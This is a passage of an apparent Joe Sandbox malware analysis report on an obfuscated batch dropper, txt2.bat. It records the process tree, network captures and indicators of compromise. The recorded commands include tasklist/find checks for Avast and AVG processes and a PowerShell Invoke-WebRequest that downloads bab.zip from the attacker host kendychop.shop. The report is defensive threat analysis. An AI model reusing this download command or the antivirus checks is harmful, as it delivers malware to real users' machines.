                                high
                                http://kendychop.shop:9135/bab.zipXpowershell.exe, 00000007.00000002.1480000178.00000169EFEE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://kendychop.shop:9135/bab.zipt9powershell.exe, 00000007.00000002.1478677710.00000169EE360000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://aka.ms/pscore68powershell.exe, 00000007.00000002.1460447040.0000016980001000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://kendychop.shop:9135powershell.exe, 00000007.00000002.1460447040.000001698117D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1460447040.00000169815F6000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1460447040.0000016980001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://oneget.orgpowershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      154.216.17.175
                                      kendychop.shopSeychelles
                                      135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1554979
                                      Start date and time:2024-11-13 09:41:10 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 37s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:txt2.bat
                                      Detection:MAL
                                      Classification:mal80.troj.winBAT@12/3@2/1
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 1
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .bat
                                      • Stop behavior analysis, all processes terminated
                                      • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                      • Excluded IPs from analysis (whitelisted): 20.101.57.9
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 7812 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      TimeTypeDescription
                                      03:42:25API Interceptor17x Sleep call for process: powershell.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      154.216.17.175txt.batGet hashmaliciousUnknownBrowse
                                      • kendychop.shop:9135/bab.zip
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      s-part-0017.t-0009.t-msedge.nethttp://t.nypost.com/1/e/r?aqet=clk&r=2&ca=26510028&v0=aftua%40gmail.com&ru=//www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%SERIAL%25wDnNeW8yycT&sa=t&esrc=nNeW8F%SERIAL%25A0xys8Em2FL&source=&cd=tS6T8%SERIAL%25Tiw9XH&cad=XpPkDfJX%SERIAL%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%79%64%61%2E%6E%67%2F%63%69%67%2E%62%69%6E%2F%67%67%6C%6E%46%78%50%51%30%47%76%38%64%43%45%35%45%43%61%37%66%37%78%63%58%71%32%79%74%4D%57%65%54%6E%31%37%53%74%68%66%4C%56%74%52%44%70%4E%58%36%63%6B%42%66%50%7A%42%38%6B%51%52%36%38%64%67%53%64%31%4C%6C%73%33%71%37%76%6E%79%6E%48%6D%75%41%73%31%2F%23Y2hyaXN0b3BoZXIuZG9sYW5AdmlyZ2lubW9uZXkuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                      • 13.107.246.45
                                      DHL.exeGet hashmaliciousFormBookBrowse
                                      • 13.107.246.45
                                      https://eu-central-1.protection.sophos.com/?d=xxxlgroup.com&u=aHR0cHM6Ly9zZXJ2aWNlcy5pc3QueHh4bGdyb3VwLmNvbS9QYXltZW50U2VydmljZS8xNy8wWi8wMDAxYzk5YzBhYzVjMGUzMDAwMDNmMzgwMDAwODkxODE0Nzk3NWMy&i=NWM0YWFhZTFlYmMxMjgxMzI2Mzk1MmZj&t=UjJrRmV2QXpnYUF0RUsvV3haZ0lQMllKYVZRbjFESmtncHdLSjlTVGFWST0=&h=30d9cb4dc2a54dd59052f7a4a0edde4a&s=AVNPUEhUT0NFTkNSWVBUSVYENbLvm6o_1YsgOojZ1VDNrB0gxZ-tcqRfXFH68hrgRwGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      https://eu-central-1.protection.sophos.com/?d=xxxlgroup.com&u=aHR0cHM6Ly9zZXJ2aWNlcy5pc3QueHh4bGdyb3VwLmNvbS9QYXltZW50U2VydmljZS8xNy8wWi8wMDAxYzk5YzBhYzVjMGUzMDAwMDNmMzgwMDAwODkxODE0Nzk3NWMy&i=NWM0YWFhZTFlYmMxMjgxMzI2Mzk1MmZj&t=UjJrRmV2QXpnYUF0RUsvV3haZ0lQMllKYVZRbjFESmtncHdLSjlTVGFWST0=&h=30d9cb4dc2a54dd59052f7a4a0edde4a&s=AVNPUEhUT0NFTkNSWVBUSVYENbLvm6o_1YsgOojZ1VDNrB0gxZ-tcqRfXFH68hrgRwGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fportal.eftsure.com.au%2finvite%2f%7b5943C803%2d027A%2d43C9%2dBBBB%2dDE0322D1F961%7d&umid=92db6cfc-6cf7-46fe-8f32-20799b471c27&auth=3a5566c60b1f4d8525fa8ab109f94675a663eb25-8cbc03c09e9a72f57497c9be7e9f6ecc1a7de37eGet hashmaliciousHTMLPhisherBrowse
                                      • 13.107.246.45
                                      http://newsletter.beyondkey.net/l/b7m9dXlumpLnfYVtr2FDJA/n5lHXXJe9HZ3IfhaVldmnw/G050vNJkt892QtBQ0L0RNk8wGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      https://secure.flyerpr.com/~cafemagui/wordpress/wp-includes/css/kr.html#jh.lee@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      https://temp.farenheit.net/XNmRkL0JpUmxBQTZuV2tIZUROa0lqeFhjbUlHS1FUR2d2YjZVKzQrNmxLeGxNOWRBLzMrc0pQRERZejVvZTA2ZENOTU5qV1hoaG1oL2JqQit5cE9DdEs1OS9NbVRVQUlObzNpVFlGMmZDT2lrWUVmeGVHNHU4REdtb04vME5iTDZBbVZ5cVc3ZXRxVnE1YkE0eWd3Z3RFVFYvWXh2OHJGRTVOaTJ5b0pPVEpsNDhXZnM5M1B2S3RPYU54MjZCRENPdjJ5bGl6bmxDc3IvOW1Ub3JsaXpaTWRsU0FlcU1pU2NzbzdrcXc9PS0tRTRqMzk0TUpka2xBNHo0Wi0tMTBZdXRlVmpmTWI1WnVlQkhpazZ1dz09?cid=2268024181Get hashmaliciousKnowBe4Browse
                                      • 13.107.246.45
                                      https://qacvconsulting.aha.io/shared/9d080aba3b5bbe9dd55708b4063b235aGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      https://fileshareiytrardocumentatabajhgaplafa.com/excel/Get hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      kendychop.shoptxt.batGet hashmaliciousUnknownBrowse
                                      • 154.216.17.175
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      SKHT-ASShenzhenKatherineHengTechnologyInformationCotxt.batGet hashmaliciousUnknownBrowse
                                      • 154.216.17.175
                                      ES20241104044200_1910049770.pdf.exeGet hashmaliciousRemcosBrowse
                                      • 154.216.20.185
                                      018292540-SuratTeguranPPI-20230814215304.PDF.exeGet hashmaliciousRemcosBrowse
                                      • 154.216.20.185
                                      new.batGet hashmaliciousUnknownBrowse
                                      • 154.216.17.175
                                      vsbeps.elfGet hashmaliciousMiraiBrowse
                                      • 154.216.16.109
                                      vkjqpc.elfGet hashmaliciousMiraiBrowse
                                      • 154.216.16.109
                                      wnbw86.elfGet hashmaliciousMiraiBrowse
                                      • 154.216.16.109
                                      vwkjebwi686.elfGet hashmaliciousMiraiBrowse
                                      • 154.216.16.109
                                      wriww68k.elfGet hashmaliciousMiraiBrowse
                                      • 154.216.16.109
                                      vsbeps.elfGet hashmaliciousMiraiBrowse
                                      • 154.216.16.109
                                      No context
                                      No context
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllultnxj:NllU
                                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e................................................@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (21092), with no line terminators
                                      Entropy (8bit):0.0379333516682279
                                      TrID:
                                      • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                      • MP3 audio (1001/1) 33.33%
                                      File name:txt2.bat
                                      File size:15'728'640 bytes
                                      MD5:20c44e3a38bcacfb2c8031da775e2ae0
                                      SHA1:8cbe23f3a4f398d605d0e0555b1fa8b7fde08572
                                      SHA256:ca4230d9cfaed1e30718b8d2424452c89b3ef062ec5057d1a15185e58407440e
                                      SHA512:3d7b97e40adf458bf118018f592f8514260203cf760498cb2d132ab0119b50a042a62add0425a91ffc294f4617cb95e7e8226aeb916a41ead492660ba955524c
                                      SSDEEP:192:2WfcLFLtLJrUFiT3YZpgUKgv6uqfYZcxSPj8gkFKKV4tkHh0TmHV36q/R+6j4tOH:2fFlEg/lKoXFjjLODs/Jn
                                      TLSH:79F64A304EC22B3EE00AC47D6192C45B5431E93E409573AEED763B690E93F19B2DA977
                                      File Content Preview:..&@cls&@set "Rk...=XzFGqSa0IPwiCZn5okJD8M@9jAKchU7NeOmtuHT46fr3LWxBdlbR1YV 2sEvpgyQ"..%Rk...:~22,1%%Rk...:~32,1%%Rk...:~27,1%%Rk...:~28,1%%Rk...:~16,1%%Rk...:~55,1%%Rk...:~16,1%%Rk...:~41,1%%Rk...:~41,1%..%Rk...:~57,1%%Rk...:~32,1%%Rk...:~35,1%%Rk...:~49
                                      Icon Hash:9686878b929a9886
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-11-13T09:42:31.782697+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.749781TCP
                                      2024-11-13T09:43:00.489134+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.755131TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 13, 2024 09:42:26.579874992 CET497649135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:26.584937096 CET913549764154.216.17.175192.168.2.7
                                      Nov 13, 2024 09:42:26.585320950 CET497649135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:26.587765932 CET497649135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:26.592706919 CET913549764154.216.17.175192.168.2.7
                                      Nov 13, 2024 09:42:27.203845978 CET913549764154.216.17.175192.168.2.7
                                      Nov 13, 2024 09:42:27.203911066 CET497649135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:27.218369007 CET497649135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:27.222171068 CET497709135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:27.223248005 CET913549764154.216.17.175192.168.2.7
                                      Nov 13, 2024 09:42:27.227304935 CET913549770154.216.17.175192.168.2.7
                                      Nov 13, 2024 09:42:27.227421045 CET497709135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:27.227750063 CET497709135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:27.232779026 CET913549770154.216.17.175192.168.2.7
                                      Nov 13, 2024 09:42:27.848781109 CET913549770154.216.17.175192.168.2.7
                                      Nov 13, 2024 09:42:27.848843098 CET497709135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:27.849029064 CET497709135192.168.2.7154.216.17.175
                                      Nov 13, 2024 09:42:27.854984045 CET913549770154.216.17.175192.168.2.7
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 13, 2024 09:42:13.043061018 CET5462353192.168.2.71.1.1.1
                                      Nov 13, 2024 09:42:26.536885977 CET5087853192.168.2.71.1.1.1
                                      Nov 13, 2024 09:42:26.567445040 CET53508781.1.1.1192.168.2.7
                                      Nov 13, 2024 09:42:58.212424994 CET5358033162.159.36.2192.168.2.7
                                      Nov 13, 2024 09:42:58.830096006 CET53633611.1.1.1192.168.2.7
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 13, 2024 09:42:13.043061018 CET192.168.2.71.1.1.10x5485Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                      Nov 13, 2024 09:42:26.536885977 CET192.168.2.71.1.1.10xef0fStandard query (0)kendychop.shopA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 13, 2024 09:42:13.050204992 CET1.1.1.1192.168.2.70x5485No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                      Nov 13, 2024 09:42:13.391809940 CET1.1.1.1192.168.2.70x4a4dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Nov 13, 2024 09:42:13.391809940 CET1.1.1.1192.168.2.70x4a4dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                      Nov 13, 2024 09:42:26.567445040 CET1.1.1.1192.168.2.70xef0fNo error (0)kendychop.shop154.216.17.175A (IP address)IN (0x0001)false
                                      • kendychop.shop:9135
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749764154.216.17.17591357812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 13, 2024 09:42:26.587765932 CET171OUTGET /bab.zip HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: kendychop.shop:9135
                                      Connection: Keep-Alive


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.749770154.216.17.17591357812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 13, 2024 09:42:27.227750063 CET171OUTGET /bab.zip HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: kendychop.shop:9135
                                      Connection: Keep-Alive


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:03:42:22
                                      Start date:13/11/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\txt2.bat" "
                                      Imagebase:0x7ff602ba0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:03:42:22
                                      Start date:13/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:03:42:22
                                      Start date:13/11/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:tasklist /FI "IMAGENAME eq AvastUI.exe"
                                      Imagebase:0x7ff658640000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:4
                                      Start time:03:42:22
                                      Start date:13/11/2024
                                      Path:C:\Windows\System32\find.exe
                                      Wow64 process (32bit):false
                                      Commandline:find /i "AvastUI.exe"
                                      Imagebase:0x7ff6a44d0000
                                      File size:17'920 bytes
                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:5
                                      Start time:03:42:22
                                      Start date:13/11/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:tasklist /FI "IMAGENAME eq avgui.exe"
                                      Imagebase:0x7ff658640000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:6
                                      Start time:03:42:22
                                      Start date:13/11/2024
                                      Path:C:\Windows\System32\find.exe
                                      Wow64 process (32bit):false
                                      Commandline:find /i "avgui.exe"
                                      Imagebase:0x7ff6a44d0000
                                      File size:17'920 bytes
                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:7
                                      Start time:03:42:23
                                      Start date:13/11/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Reset < >
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1483150191.00007FFAAC320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC320000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ffaac320000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                        • Instruction ID: 79b5eb7864350c0329d5ea301e82f3e293211ef6b1f0029a7816f94433c3bb95
                                        • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                        • Instruction Fuzzy Hash: B601677111CB0C8FDB84EF0CE455AA5B7E0FB95364F10056DE58AC3665D636E881CB45